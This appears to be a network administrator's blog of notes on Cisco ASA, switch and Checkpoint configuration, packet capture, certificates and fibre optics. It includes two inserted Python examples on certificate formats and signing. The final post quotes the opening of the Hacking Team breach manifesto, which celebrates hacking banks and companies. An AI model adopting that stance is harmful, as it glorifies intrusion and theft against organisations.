Friday, 23 December 2016

kiwi syslog server notes

You can set up several displays. Display 00 is the default and usually shows everything.

Configure circular logging.
It's a good idea to set up display 01 as (drop-deny):
Create a new rule and call it drop/deny.
Add a filter, choose simple filter and put in "drop" "deny".
Add the action "display" and choose display 01.
In the setup section go to display 01 and update the name to "display 01 (drop-deny)".
You can add other actions like send email etc.
You can create lots of displays for VPN troubleshooting etc.
Also enable the highlighting options; the defaults are decent, you can edit them as needed.
You can also tick an option to auto-scale the width to fit messages.


I like this file name
E:\syslog\%IPAdd4-%DateISO.txt

Worth installing tail also. (cygwin is good)

Monday, 19 December 2016

packet capture on checkpoint firewall

Use the topology table on the Checkpoint to see which interface you need to monitor

netstat -nr | grep x.x.x.x can be useful too

tcpdump -i eth5 -s0 host 192.168.1.50 -w /var/tmp/packet-capture.pcap


Copy your .pcap file off with WinSCP and open it in Wireshark

or read it on the CLI:
tcpdump -r /var/tmp/packet-capture.pcap

Friday, 2 December 2016

hairpin / u-turn on ASA

Anyconnect NAT
Say you want AnyConnect users to connect but then get to the internet via your public IP. You'll need the same-security-traffic command too.

Same as your anyconnect pool
object network OBJ-10.50.150.0
 subnet 10.50.150.0 255.255.255.0

object network OBJ-10.50.150.0
 nat (OUTSIDE,OUTSIDE) dynamic interface


Hair-pin NAT
This is a NAT where I wanted to access a DMZ server on its public IP from the inside LAN
Need to set some objects up first.

nat (INSIDE,DMZ) source static OBJ-10.59.0.0-19 OBJ-10.59.0.0-19 destination static OBJ-SERVER-PUB-IP OBJ-172.59.0.10 no-proxy-arp 


Re-write DNS
Simpler solution than the above:
object network DMZ-WEBSERVER
 nat (DMZ,OUTSIDE) static 100.190.220.74 dns

The dns keyword uses the created xlate to rewrite the DNS record.

Wednesday, 30 November 2016

add a gui client IP on checkpoint

SSH into the CP management server
cpconfig
3)  GUI Clients
Add the IP address

In SmartDashboard go into the Users and Administrators section
Create the user and assign a password under Authentication

see also
http://www.roesen.org/files/cp_cli_ref_card.pdf

Monday, 28 November 2016

replacing an ASA steps

Before switching, to get an idea of the numbers you should see after switching, take a screenshot of the following:
sh conn count
sh xlate count
sh crypto map sa
Identify important VPNs.
Get VPN PSKs with "more system:running-config".
Check for any certificates installed on the ASA (they cannot be copied; they must be added again).
Do a full backup in ASDM and make sure you have your configs.


Switch over cables
First thing, make sure you have internet access.
Make sure interfaces have been "no shut".
Often you have to unplug and re-plug cables on ISP devices to resolve ARP cache issues.
Ping out all interfaces to ensure all VLANs etc. are working.
Once we have that, look at the VPNs and make sure they are up.
You might need to generate some traffic to bring them up.
Check that AnyConnect from outside is working.
Check the ASDM / AnyConnect image.
Re-install certificates.


Storage device not found. Install drive and try again. Cisco Firepower

When trying to install the Cisco FirePOWER module you get the error below.

When you run this command:
sw-module module sfr recover boot
The ASA returns the error:
Storage device not found.  Install drive and try again.

Some users have reported that reloading the ASA resolves this (if you have an SSD installed).

Most likely you are missing your SSD drive: either it's not installed, it's broken, or the ASA was replaced but no SSD was sent with the replacement or it was never swapped from the old unit to the replacement unit.

You can see if you have an SSD installed with "sh inv"; it should look like this:

Name: "Chassis", DESCR: "ASA 5525-X with SW, 8 GE Data, 1 GE Mgmt, AC"
PID: ASA5525           , VID: V04     , SN: ABCXXXXXXX

Name: "Storage Device 1", DESCR: "Model Number: Micron_M550_MTFDDAK128MAY"
PID: N/A               , VID: N/A     , SN: EFGXXXXXXX

If you don't see a storage device, it's not there.

If you still have your old unit you can try swapping the SSD.
Otherwise contact Cisco (or your support) about getting a replacement.


Commands to collect from CLI for cisco TAC

show inv

show module

show raid



Monday, 31 October 2016

quick way to check if a port is open linux


$ nc -zv 159.134.168.117 80 443
Connection to 159.134.168.117 80 port [tcp/http] succeeded!
Connection to 159.134.168.117 443 port [tcp/https] succeeded!

Monday, 24 October 2016

setup DHCP on cisco ASA

dhcpd dns 10.30.0.1 10.30.0.2
dhcpd wins 10.32.0.1
dhcpd domain mydomain.com
dhcpd auto_config outside
dhcpd address 10.30.14.20-10.32.14.199 inside
dhcpd enable inside
dhcpd address 10.30.114.10-10.32.114.199 VOICE
dhcpd enable VOICE

DHCP options
dhcpd option [x] [ascii|hex|ip]

Default GW
dhcpd option 3 ip 10.30.0.254

New reservation command as of 9.13.1
dhcpd reserve-address 10.20.14.50 xxx.yyyy.zzzz inside

Show commands
show dhcpd binding

Clear commands
clear dhcpd binding all
clear dhcpd binding 10.30.14.20

Thursday, 6 October 2016

checkpoint interface spoofing

Use Tracker to see the interface where the traffic is being dropped.
Check which firewall and interface it was dropped on.
Open the correct firewall policy in SmartDashboard.
Go to Groups -> find the interface.
Add the network to the interface.

Wednesday, 5 October 2016

sample switch config

Setup a local user
username local-user privilege 15 password 0 P@55w0rd
username MYUSER privilege 15 algorithm-type scrypt secret P@55w0rd

Set the enable secret
enable secret s3cr3t

Save 
write mem

Set hostname
hostname SITE-3650

Don't try to look up hostnames
no ip domain lookup 

Set up the line settings
line con 0
 logging synchronous
line vty 0 4
 transport input ssh
line vty 5 15
 transport input ssh


Enable cdp
cdp run

set ntp server
ntp server 172.30.123.1

Set default gateway (L2)
ip default-gateway 172.30.1.1


Set banner
banner login ^
*** MY BANNER ***
^

Enable ip routing (L3 functions)
ip routing

Set L3 default route
ip route 0.0.0.0 0.0.0.0 vlan 10 172.172.10.249

Set domain name
ip domain-name mydomain.ie



Generate rsa key (for ssh)
conf t
crypto key generate rsa general-keys label MYLABEL modulus 2048

Setup spanning tree
spanning-tree mode rapid-pvst

Set up local logging buffer
Generally it's set very low. Use dir to check how much space you have.
If you have a syslog server it's not an issue.
logging buffered 5000000 debugging

Set up AAA
aaa new-model
!
!
aaa group server radius NPS
 server 172.16.50.1 auth-port 1645 acct-port 1646
 server 172.16.50.2 auth-port 1645 acct-port 1646
!
aaa authentication login default group NPS local
aaa authentication login CON local
aaa authentication dot1x default group NPS local
!
!
!
aaa session-id common

Setup SVI on the switch
interface Vlan10
 ip address 172.30.10.253 255.255.255.0
 ip helper-address 172.16.1.50

Set management interface
interface Loopback100
 description SWITCH MGMT
 ip address 172.30.100.10 255.255.255.255

Set up so RADIUS traffic is sourced from the management IP
ip radius source-interface Loopback100

Set up radius
radius-server host 172.16.50.1 auth-port 1645 acct-port 1646
radius-server host 172.16.50.2 auth-port 1645 acct-port 1646
radius-server retransmit 0
radius-server timeout 1
radius-server key MY-SECRET-RADIUS-KEY


****
Side note - upgraded a 3750E to 15.2 and it broke RADIUS.
Change to calling the group:


aaa group server radius NPS
server name NPS-1
server name NPS-2

radius server NPS-1
address ipv4 172.16.35.63 auth-port 1645 acct-port 1646
pac key **********
!
radius server NPS-2
address ipv4 172.16.35.43 auth-port 1645 acct-port 1646
pac key ********
!



Setup your access ports
interface FastEthernet0/1
 switchport mode access (set the port as an access port)
 switchport access vlan 10 (data vlan for PC)
 switchport voice vlan 200 (voice vlan for IP phone)

 switchport port-security (turn on port security)
 switchport port-security maximum 2 (max 2 MAC's phone and PC)
 switchport port-security violation restrict (log and ignore the extra traffic)
 spanning-tree portfast (don't wait 60 seconds to bring the port up)
 spanning-tree bpduguard enable (err-disable the port if we detect switch/BPDU)
 no shutdown (bring the port up)

Setup trunk ports
interface GigabitEthernet0/3
 switchport trunk encapsulation dot1q
 switchport mode trunk





You may have to set tftp source interface
ip tftp source-interface

Setup VTP
You won't find these settings in show run. Use "sh vtp status" and "sh vtp password" on another switch and configure the same settings on the new switch. Most likely you'll want to use client mode.
SITE-3650#sh vtp status
VTP Version                     : running VTP2
Configuration Revision          : 15
Maximum VLANs supported locally : 1005
Number of existing VLANs        : 30
VTP Operating Mode              : Client
VTP Domain Name                 : MYDOMAIN
VTP Pruning Mode                : Disabled
VTP V2 Mode                     : Enabled
VTP Traps Generation            : Disabled
MD5 digest                      : 0x7C 0x91 0x1E 0x52 0x99 0x80 0x60 0x5E




This one has an ACL applied to SSH:
line con 0
 session-timeout 15
 exec-timeout 0 0
 logging synchronous
 login authentication CON
 history size 256
line vty 0 4
 session-timeout 15
 access-class 2 in
 exec-timeout 15 0
 password 7 0034212757550A045E72
 logging synchronous
 length 0
 history size 256
 transport input ssh
 transport output ssh
line vty 5 15
 session-timeout 15
 access-class 2 in
 exec-timeout 15 0
 password 7 0034212757550A045E72
 logging synchronous
 history size 256
 transport input ssh
 transport output ssh

Setup port channel interface if needed
interface Port-channel40
 description "*** PortChan members gig1/1/1 and gig2/1/1 ***"
 switchport trunk encapsulation dot1q
 switchport trunk native vlan 10
 switchport mode trunk
 switchport nonegotiate
 storm-control broadcast level 10.00
 ip dhcp snooping trust

Setup port channel members (channel-group)
interface GigabitEthernet1/1/1
 description *** Link to core ***
 switchport trunk encapsulation dot1q
 switchport trunk native vlan 100
 switchport mode trunk
 switchport nonegotiate
 srr-queue bandwidth share 10 10 60 20
 priority-queue out
 mls qos trust dscp
 storm-control broadcast level 10.00
 channel-group 40 mode on
 ip dhcp snooping trust
end

interface GigabitEthernet2/1/1
 description *** link to core ***
 switchport trunk encapsulation dot1q
 switchport trunk native vlan 100
 switchport mode trunk
 switchport nonegotiate
 srr-queue bandwidth share 10 10 60 20
 priority-queue out
 mls qos trust dscp
 storm-control broadcast level 10.00
 channel-group 40 mode on
 ip dhcp snooping trust

Setup eigrp
router eigrp 100
network 172.30.1.0 0.0.0.255 (wildcard mask)

installing certificates on the cisco ASA

Wildcard cert

GoDaddy steps
What you need
  • Purchased wildcard cert
  • Login details for godaddy site
  • Access to public DNS provider to create URLs and TXT record
  • Access to ASA/ASDM
  • Access to domain controller/server where you can install openssl
Saving the private key
When setting up a new wildcard, GoDaddy gives you the option to save the CSR and the private key. You should save these. The client might have created it already; you can look on the domain controller or email server for it and see if you can export it from mmc -> certificates snap-in. If it can't be found or is lost you can rekey the cert; contact GoDaddy for steps. I believe the rekey can cause issues if the cert is already installed somewhere, as now the private key won't match. Try to avoid this.
DNS provider
You need to verify a wildcard with a DNS TXT record, so you need to contact the DNS provider. GoDaddy provide instructions.
You can check the TXT records here: https://dnslookup.online/txt.html
Once the cert is set up you can download the zip file. Choose the "other" option.
You may need to get "vpn.domain.ie" pointing to the public IP of the ASA.
Create combined PKCS12 / PFX file with Openssl
Now use openssl to bundle the private key + wildcard cert into one file with a password.
You may need to install openssl (http://gnuwin32.sourceforge.net/summary.html)
Openssl command:
openssl pkcs12 -export -inkey MY_PRIV_KEY.key -in WILDCARD_CERT.crt -out STAR_DOMAIN_COMBINED.p12
You will be asked for a password here; save this password.
It's a good idea to install the PFX on the customer domain controller for safe keeping.
Install as exportable.
Choose the computer account.
Choose the personal cert store.
You can find the cert later in start -> run -> mmc -> add certs snap-in.
ASA install
Now install the STAR_DOMAIN_COMBINED.p12 on the Cisco ASA via ASDM.
ASDM -> Configuration -> Certificate Management -> CA Certificates -> Add -> CA cert (from the zip file downloaded from GoDaddy)
Now click on Identity Certs -> Add
Choose "Import the identity cert from a file (PKCS12)"
Enter the password you entered at the openssl step
Select the STAR_DOMAIN_COMBINED.p12
Click "Add certificate"
Apply to interface.
Configuration -> Advanced -> SSL settings
Click on outside interface -> Edit button and select the cert
Testing
Go to your AnyConnect URL.
Confirm the cert is set up with Chrome -> developer tools -> security, or this one:
https://www.sslshopper.com/ssl-checker.html



This is the process of installing a wildcard cert if you have one:
https://www.tunnelsup.com/adding-a-wildcard-ssl-certificate-to-a-cisco-asa/

Get the following
The password used to export the certs (if a password is not set up you can generate this by using the OpenSSL app)
The certificate private key (pfx) file (in pem format)
The wildcard certificate (in pem format)
The intermediary certificate (in pem format)

The customer should have access to their trusted root CA portal where you can download most files. The customer should have the private key (pfx) file and the password for it. The trusted root CA does not hold that. It's generated when the cert is used for the first time.

In the past we have found the customer imported the private key onto a webserver but didn't save the private key. We were able to export the private key from the web server. We had to open mmc, add the certificate snap-in and add it for the computer account.

Download and install Win32/Win64 OpenSSL to convert your cert into the correct format.
See https://support.citrix.com/article/CTX136444

Use openssl to create the pkcs12 file. This is done by bundling the private key + the wildcard cert.

Openssl command:
openssl pkcs12 -export -inkey MY_PRIV_KEY.key -in WILDCARD_CERT.crt -out STAR_DOMAIN_COMBINED.p12

Or, including the intermediate bundle via -certfile:
openssl pkcs12 -export -in CERT.crt -inkey PKEY.key -certfile sf_bundle-g2-g1.crt -out BUNDLE.pfx

Make sure to save the password you enter. Now this file can be imported into ASDM.

It can also be done here: https://www.sslshopper.com/ssl-converter.html
However it's advised that you don't upload your certs to a third party; use openssl on your own PC.

If you have an old/expired wildcard cert you can remove it now, otherwise you might get an error when trying to assign the new one to an interface.

Add the CA cert (pem - plain text BEGIN CERT etc)
Configuration > Device Management > Certificate Management > CA Certificates
Add the pkcs12 cert (pfx) with password
Configuration > Device Management > Certificate Management > Ident Certificates
Assign the cert to the interface (advanced -> SSL)
Configuration > Device Management > Advanced > SSL

This is the process of creating an ident cert and getting it signed by your CA, they send you a signed cert that you can install.
https://www.tunnelsup.com/adding-an-ssl-certificate-on-an-asa/

Ident certs
Create ident cert (config -> Firewall -> Advanced -> Certificate management -> Ident cert)
Add new (create a new key pair if you need to)
Click select button and fill in the details
In this example the URL I have bought the cert for is remote.domain.ie
subject-name CN=remote.domain.ie,OU=IT,O=Customer,C=IE,St=Leinster,L=Dublin
Export cert and send to CA
CA sends back signed cert
Install signed cert
Apply to interface.


After installing
Export the cert + key from ASDM and install the .pfx on their Windows server so they don't lose it. Don't forget to record the password.
 
More on certs

.csr
This is a Certificate Signing Request. Some applications can generate these for submission to certificate-authorities. The actual format is PKCS10 which is defined in RFC 2986. It includes some/all of the key details of the requested certificate such as subject, organization, state, whatnot, as well as the public key of the certificate to get signed. These get signed by the CA and a certificate is returned. The returned certificate is the public certificate (which includes the public key but not the private key), which itself can be in a couple of formats.

.pem
Defined in RFCs 1421 through 1424, this is a container format that may include just the public certificate (such as with Apache installs, and CA certificate files in /etc/ssl/certs), or may include an entire certificate chain including public key, private key, and root certificates. Confusingly, it may also encode a CSR (e.g. as used here) as the PKCS10 format can be translated into PEM. The name is from Privacy Enhanced Mail (PEM), a failed method for secure email, but the container format it used lives on, and is a base64 translation of the x509 ASN.1 keys.

.key
This is a PEM formatted file containing just the private key of a specific certificate and is merely a conventional name and not a standardized one. In Apache installs, this frequently resides in /etc/ssl/private. The rights on these files are very important, and some programs will refuse to load these certificates if they are set wrong.

.pkcs12 .pfx .p12
Originally defined by RSA in the Public-Key Cryptography Standards, the "12" variant was enhanced by Microsoft. This is a passworded container format that contains both public and private certificate pairs. Unlike .pem files, this container is fully encrypted. Openssl can turn this into a .pem file with both public and private keys: openssl pkcs12 -in file-to-convert.p12 -out converted-file.pem -nodes
A few other formats that show up from time to time:

.der
A way to encode ASN.1 syntax in binary, a .pem file is just a Base64 encoded .der file. OpenSSL can convert these to .pem (openssl x509 -inform der -in to-convert.der -out converted.pem). Windows sees these as Certificate files. By default, Windows will export certificates as .DER formatted files with a different extension. Like...

.cert .cer .crt
A .pem (or rarely .der) formatted file with a different extension, one that is recognized by Windows Explorer as a certificate, which .pem is not.

.p7b
Defined in RFC 2315, this is a format used by windows for certificate interchange. Java understands these natively. Unlike .pem style certificates, this format has a defined way to include certification-path certificates.

.p7s
Looks like this one is used for signing emails

.crl
A certificate revocation list. Certificate Authorities produce these as a way to de-authorize certificates before expiration. You can sometimes download them from CA websites.
In summary, there are four different ways to present certificates and their components:

PEM Governed by RFCs, it's used preferentially by open-source software. It can have a variety of extensions (.pem, .key, .cer, .cert, more)

PKCS7 An open standard used by Java and supported by Windows. Does not contain private key material.

PKCS12 A private standard that provides enhanced security versus the plain-text PEM format. This can contain private key material. It's used preferentially by Windows systems, and can be freely converted to PEM format through use of openssl.

DER The parent format of PEM. It's useful to think of it as a binary version of the base64-encoded PEM file. Not routinely used by much outside of Windows.

x509 (can be .pfx, .der, .cer, .crt)
Usually in some directory like C:\webserver\apache\cert
Drop in the new server.crt (just the cert file)
Drop in server.key (the private key) in the same directory
Restart the webserver

A body starting with "MII" means base64 encoded; you will often see this with x509 certs.
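An added example (not from the original notes) that applies the format rules above: it tells PEM, bare DER and PKCS12 apart from the bytes, splits a PEM chain into its blocks, converts between PEM and DER, and shows why a base64 certificate body starts with "MII". The sample blobs are constructed minimal ASN.1 objects, not real certificates or keys.

```python
import base64
import re

# Constructed sample blobs (not real certificates or keys) so the example runs
# offline. Real DER objects start the same way: 0x30 = SEQUENCE, 0x82 = "a
# two-byte length follows". That header is why the base64/PEM body of nearly
# every certificate begins with "MII".
SAMPLE_CERT_DER = bytes.fromhex("30820002" "3000")          # SEQUENCE { SEQUENCE {} }
SAMPLE_P12_DER = bytes.fromhex("30820005" "020103" "0400")  # SEQUENCE { INTEGER 3, OCTET STRING "" }
SAMPLE_KEY_DER = bytes.fromhex("3003" "020100")             # SEQUENCE { INTEGER 0 } (PKCS#8-like)

_PEM_BLOCK = re.compile(r"-----BEGIN ([A-Z0-9 ]+)-----(.*?)-----END \1-----", re.S)


def der_header(blob: bytes):
    """Parse the outer DER SEQUENCE header. Returns (header_len, content_len)
    or None if the blob does not start with a well-formed SEQUENCE."""
    if len(blob) < 2 or blob[0] != 0x30:
        return None
    first = blob[1]
    if first < 0x80:                       # short form: one length byte
        return 2, first
    num = first & 0x7F                     # long form: number of length bytes
    if num == 0 or len(blob) < 2 + num:
        return None
    return 2 + num, int.from_bytes(blob[2:2 + num], "big")


def is_pkcs12(blob: bytes) -> bool:
    """PKCS#12 PFX ::= SEQUENCE { version INTEGER (3), ... }. An X.509 cert's
    first inner element is itself a SEQUENCE (tbsCertificate), so this
    separates a .p12/.pfx from a DER .cer/.crt."""
    hdr = der_header(blob)
    return hdr is not None and blob[hdr[0]:hdr[0] + 3] == b"\x02\x01\x03"


def pem_blocks(text: str):
    """Split a PEM file into (label, DER bytes) pairs, in file order. A chain
    file yields several CERTIFICATE blocks; a .pem that also carries the key
    yields a PRIVATE KEY block too."""
    out = []
    for label, body in _PEM_BLOCK.findall(text):
        out.append((label, base64.b64decode("".join(body.split()))))
    return out


def der_to_pem(der: bytes, label: str) -> str:
    """Inverse of pem_blocks: base64 the DER and wrap it at 64 columns."""
    b64 = base64.b64encode(der).decode("ascii")
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return f"-----BEGIN {label}-----\n" + "\n".join(lines) + f"\n-----END {label}-----\n"


def starts_with_mii(der: bytes) -> bool:
    """True when the base64 of this DER begins with "MII", i.e. it is a
    SEQUENCE with a two-byte length (any object under 16 KiB)."""
    return base64.b64encode(der)[:3] == b"MII"


def classify(blob: bytes) -> str:
    """Name the container format of a file's bytes: PEM (with the labels
    found), PKCS12, bare DER, or unknown."""
    blocks = pem_blocks(blob.decode("ascii", errors="ignore"))
    if blocks:
        return "PEM: " + ", ".join(sorted({label for label, _ in blocks}))
    hdr = der_header(blob)
    if hdr is not None and hdr[0] + hdr[1] == len(blob):
        return "PKCS12 (DER)" if is_pkcs12(blob) else "DER"
    return "unknown"


def pem_summary(text: str) -> dict:
    """Count blocks per label and flag whether private key material is
    present, which decides how carefully the file must be stored."""
    counts: dict = {}
    for label, _ in pem_blocks(text):
        counts[label] = counts.get(label, 0) + 1
    return {"counts": counts,
            "has_private_key": any("PRIVATE KEY" in k for k in counts)}


if __name__ == "__main__":
    chain = (der_to_pem(SAMPLE_CERT_DER, "CERTIFICATE") * 2
             + der_to_pem(SAMPLE_KEY_DER, "PRIVATE KEY"))
    print(classify(SAMPLE_CERT_DER), classify(SAMPLE_P12_DER), classify(chain.encode()))
    print(pem_summary(chain))
```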

cryptography, encryption and certificates

Data at rest (sitting in memory or on hard disks)
Data in motion (moving through the network)

Management plane - ASDM / web interface / CLI
Control plane - routing protocols, STP etc.
Data plane - the packets passing through etc.

We need to protect both.

Encryption - used to keep data confidential at rest or in motion.
Keys - data is encrypted with a key. The key is also used to decrypt the data.
Cipher text - data that has been encrypted.
Clear text - the unencrypted data.
Symmetrical vs Asymmetrical
Symmetrical - 1 key is used to encrypt and decrypt the data (DES, 3DES, AES). Used for bulk encryption of data on disks etc.
Asymmetrical - 2 keys known as a key pair, higher CPU overhead, used with authentication.
Data encrypted by key1 can only be decrypted by key2.
Data encrypted by key2 can only be decrypted by key1.
key1 = private key
key2 = public key (public keys can be exchanged, then we encrypt with the private key)
RSA, DSA


Hash/HMAC - integrity, making sure the data hasn't been manipulated along the way (MD5, SHA). We hash the data (a math algorithm) which gives us a result known as a digest.
If we check the hash and it has been changed, we will know. HMAC is used to secure the hash by putting a secret key into the HMAC. HMAC stops man-in-the-middle attacks.

Digital signature - the hash encrypted with the private key is the digital signature.
To digitally sign you need a public/private key pair set up:
From the data, generate a hash.
Encrypt the hash with the private key (this is the digital signature).
Data + encrypted hash is sent.
The receiver hashes the data.
The encrypted hash is decrypted with the public key of the sender.
Compare the hash we calculated with the decrypted hash and make sure they match.
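The signing steps above worked through in code, as an added example that is not part of the original notes. It also contrasts a plain hash, an HMAC and a signature against a man in the middle who swaps the message. The RSA key pair is a toy built from fixed Mersenne primes (far too small and unpadded for real use), and the message and HMAC secret are constructed.

```python
import hashlib
import hmac

# Toy RSA key pair from two fixed Mersenne primes (2^127-1 and 2^521-1).
# Assumption: illustrative only; a real key pair comes from
# "crypto key generate rsa ... modulus 2048" or openssl, never from fixed primes.
_P = (1 << 127) - 1
_Q = (1 << 521) - 1
_N = _P * _Q
_E = 65537
_D = pow(_E, -1, (_P - 1) * (_Q - 1))   # private exponent (Python 3.8+)
PUBLIC_KEY = (_N, _E)                     # key2: can be handed out freely
PRIVATE_KEY = (_N, _D)                    # key1: never leaves the signer

# Constructed sample message and shared HMAC secret (not from the page).
MESSAGE = b"transfer 100 EUR to account 12345"
HMAC_KEY = b"shared-secret-between-both-ends"


def digest(data: bytes) -> bytes:
    """Plain hash: anyone can compute it, so on its own it only detects
    accidental corruption, not deliberate tampering."""
    return hashlib.sha256(data).digest()


def hmac_tag(key: bytes, data: bytes) -> bytes:
    """HMAC: the hash is keyed, so a man in the middle without the key
    cannot produce a matching tag for altered data."""
    return hmac.new(key, data, hashlib.sha256).digest()


def sign(data: bytes, private_key) -> int:
    """Sender: hash the data, then 'encrypt' the hash with the private key
    (textbook RSA, no padding, for illustration only)."""
    n, d = private_key
    h = int.from_bytes(digest(data), "big")   # 256-bit digest < n, so it fits
    return pow(h, d, n)


def verify(data: bytes, signature: int, public_key) -> bool:
    """Receiver: hash the data, 'decrypt' the signature with the sender's
    public key, and compare the two digests in constant time."""
    n, e = public_key
    recovered = pow(signature, e, n)
    if recovered >= 1 << 256:                 # cannot be a SHA-256 digest
        return False
    return hmac.compare_digest(recovered.to_bytes(32, "big"), digest(data))


def tamper_demo() -> dict:
    """Model a man in the middle who swaps the message and re-computes what
    he can. Returns whether each integrity check catches the change."""
    forged = b"transfer 100 EUR to account 99999"
    # Sender attaches all three checks to the original message.
    sent_tag = hmac_tag(HMAC_KEY, MESSAGE)
    sent_sig = sign(MESSAGE, PRIVATE_KEY)
    # The attacker can recompute a plain hash for the forged data, but has
    # neither HMAC_KEY nor the private key, so must forward the old tag and
    # signature unchanged.
    attacker_hash = digest(forged)
    return {
        "plain_hash_detects_tamper": not hmac.compare_digest(digest(forged), attacker_hash),
        "hmac_detects_tamper": not hmac.compare_digest(hmac_tag(HMAC_KEY, forged), sent_tag),
        "signature_detects_tamper": not verify(forged, sent_sig, PUBLIC_KEY),
    }


if __name__ == "__main__":
    sig = sign(MESSAGE, PRIVATE_KEY)
    print("valid signature verifies:", verify(MESSAGE, sig, PUBLIC_KEY))
    print(tamper_demo())
```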

pem format - files that end in the suffix '.pem', '.key' or '.crt' are usually in this format. If you open the file in notepad it will have BEGIN CERT and END CERT at the top and bottom.

pkcs12 format - files often end in .pfx or .p12. The file will be unreadable in notepad (encrypted); it is created by combining the private key and the CA cert (intermediate) with a tool like openssl. DigiCert provides a tool for Windows.


Friday, 23 September 2016

fibre optic cables

Fibre cables have different terminations. You need to select the right cable, which connects to your device at one end and to the fibre patch panel at the other, so you need to check both. Sometimes the cables are mixed up in the patch panel, so you need to pop the cables out and swap them around.

ST (straight tip)
SC (Subscriber connector)
LC (Local connector)
MT-RJ 

LR = long range / single mode

SR = short range / multimode

Have seen 10g LRM SFPs work on both multimode/singlemode cable.


You need to see how it is terminated at each patch point.
You need to have the correct SFP in your network device so you can plug the fibre in.
You also need to select the right cables: SC-LC, ST-ST etc.

Look a bit into the SFP and you should see a light on one side. This is the transmit side and needs to be the same all the way. You won't be able to see the light with single mode (it's too narrow for the human eye); you need to use the device's dB signal readings instead.

-> red light transmit
<- no light receive

There are OM values that relate to cable distance will update more on that later

10Gig-Base-SR (closer to 0 is better)
Typical working transmit range: -1 to -7
Typical working transmit range: -1 to -9.9

When we see a Rx power around -14 dBm or lower there is typically some sort of fault in the cable plant (bad splice, dirty connector, poorly seated jumper etc.) that's causing excessive signal loss.

If either Tx or Rx is in the -30 dBm or lower range that's usually indicative of there being no actual signal received and the transceiver is reporting the "noise floor" of the receiver stage. (https://en.wikipedia.org/wiki/Noise_floor)


https://www.cisco.com/c/en/us/products/interfaces-modules/transceiver-modules/index.html

CLI commands:

Router:

sh hw-module subslot 0/0 transceiver 2 status

sh hw-module subslot 0/0 transceiver 2 idprom

Switch:

sh int g1/0/1 status

sh int gig1/0/1 capabilities

sh int gig1/0/1 transceiver

 

Monday, 19 September 2016

Let cisco switch use 3rd party SFPs


Cisco SFP
Left side = transmit
Right side = receive
http://www.cisco.com/c/en/us/td/docs/interfaces_modules/transceiver_modules/installation/note/78_15160.html


Commands to allow using non-Cisco SFPs
service unsupported-transceiver
no errdisable detect cause gbic-invalid


taken from:
http://www.firewall.cx/cisco-technical-knowledgebase/cisco-switches/866-cisco-switches-3rd-party-sfp.html

Check your sfp
sh int gigabitEthernet 0/3 status 
sh int gigabitEthernet 0/3 capabilities (check type)


Thursday, 8 September 2016

VPN uptime

See how long a VPN is up
show vpn-sessiondb l2l filter name x.x.x.x

Tuesday, 26 July 2016

see what port ASDM is running on

You can port scan the firewall, or:

sh run | i http server enable


add a route on checkpoint CLI

route add -net 10.5.140.0/24 gw 192.168.0.1 (works for lgma; you need write mode on the FW you are adding the route on, so open the correct policy for each FW before making the change)

Remove a route (worked on PH):
route del -net 192.168.80.0/20 gw 192.168.80.51


route add -net 192.168.80.0/20 dev eth15
gives this kind of route:
192.168.80.0    0.0.0.0         255.255.240.0   U         0 0          0 eth15

Maybe this in newer versions
https://supportcenter.checkpoint.com/supportcenter/portal%3FeventSubmit_doGoviewsolutiondetails%3D%26solutionid%3Dsk39746

clish (enter clish if not already there)
set static-route 192.168.0.0/24 nexthop gateway address 10.0.0.1 priority 1 on
save config
exit
netstat -nr | grep 192.168.0.0
Run on both FWs
(works on REV fws)

Watch out for NATs; you may need to add to grp_No_NAT.
There may be a static server NAT for the server.

Show routes
netstat -nr - show all routes

netstat -nr | grep 10.5.140


Monday, 18 July 2016

Use nslookup to find the IP addresses of the domain controllers

You can use nslookup, a command-line tool that displays information you can use to diagnose Domain Name System (DNS) infrastructure.
  1. Click Start, and then click Run.
  2. In the Open box, type cmd.
  3. Type nslookup, and then press ENTER.
  4. Type set type=all, and then press ENTER.
  5. Type _ldap._tcp.dc._msdcs.

Wednesday, 1 June 2016

run ASA web interface on another port


ASDM 
 
ASA(config)#http server enable 8080

https://192.168.1.1:8080

WebVPN
ASA(config)#webvpn
ASA(config-webvpn)#enable outside
ASA(config-webvpn)#port 65010
 
https://192.168.1.1:65010 
 
https://www.cisco.com/c/en/us/support/docs/security/adaptive-security-device-manager/118842-technote-asdm-00.html 
 
 
 

You also need to allow it under the ASDM config:
http server enable 8080
http pub.pub.pub.pub 255.255.255.255 outside
http prv.prv.prv.prv 255.255.255.0 inside

Same for SSH:
ssh pub.pub.pub.pub 255.255.255.255 outside
ssh prv.prv.prv.prv 255.255.255.0 inside

Don't forget crypto key generate.
 

Tuesday, 10 May 2016

same network in use on both sides of the VPN

Often small businesses will use a 10.0.0.0/8, 192.168.0.0 /16 etc as they don't know what to fill in.


====SIDE A====
object network REAL-LOCAL-A-NET
subnet 192.168.1.0 255.255.255.0

object network MAPPED-LOCAL-A-NET
subnet 172.18.19.0 255.255.255.0

object network MAPPED-REMOTE-B-NET
subnet 172.18.20.0 255.255.255.0

nat (inside,outside) source static REAL-LOCAL-A-NET MAPPED-LOCAL-A-NET destination static MAPPED-REMOTE-B-NET MAPPED-REMOTE-B-NET

access-list VPN-ACL permit ip object MAPPED-LOCAL-A-NET object MAPPED-REMOTE-B-NET


===SIDE B====

object network REAL-LOCAL-B-NET
subnet 192.168.1.0 255.255.255.0

object network MAPPED-LOCAL-B-NET
subnet 172.18.20.0 255.255.255.0

object network MAPPED-REMOTE-A-NET
subnet 172.18.19.0 255.255.255.0

nat (inside,outside) source static REAL-LOCAL-B-NET MAPPED-LOCAL-B-NET destination static MAPPED-REMOTE-A-NET MAPPED-REMOTE-A-NET

Wednesday, 20 April 2016

hacking team breach

From
http://pastebin.com/raw/0SNSvyjJ

--[ 1 - Introduction ]----------------------------------------------------------

You'll notice the change in language since the last edition [1]. The
English-speaking world already has tons of books, talks, guides, and
info about hacking. In that world, there's plenty of hackers better than me,
but they misuse their talents working for "defense" contractors, for intelligence
agencies, to protect banks and corporations, and to defend the status quo.
Hacker culture was born in the US as a counterculture, but that origin only
remains in its aesthetics - the rest has been assimilated. At least they can
wear a t-shirt, dye their hair blue, use their hacker names, and feel like
rebels while they work for the Man.

You used to have to sneak into offices to leak documents [2]. You used to need
a gun to rob a bank. Now you can do both from bed with a laptop in hand [3][4].
Like the CNT said after the Gamma Group hack: "Let's take a step forward with
new forms of struggle" [5]. Hacking is a powerful tool, let's learn and fight!

[1] http://pastebin.com/raw.php?i=cRYvK4jb
